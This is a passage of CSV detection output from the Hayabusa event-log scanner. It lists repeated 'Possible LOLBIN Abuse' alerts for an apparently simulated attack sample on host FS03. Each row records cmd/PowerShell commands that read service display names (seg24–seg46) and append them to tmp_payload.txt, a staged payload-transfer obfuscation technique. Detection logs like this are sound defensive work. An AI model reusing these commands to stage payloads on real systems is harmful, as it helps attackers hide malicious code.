0x88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:03.010 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:03.026 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:05.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:05.911 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:14.607 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:14.623 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:16.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:16.080 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:17.549 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:17.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:29.330 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:29.346 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
